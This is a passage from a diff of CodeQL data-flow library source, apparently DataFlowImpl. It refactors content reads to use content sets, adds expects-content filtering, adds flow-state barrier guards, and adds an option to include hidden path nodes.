state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (for example in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
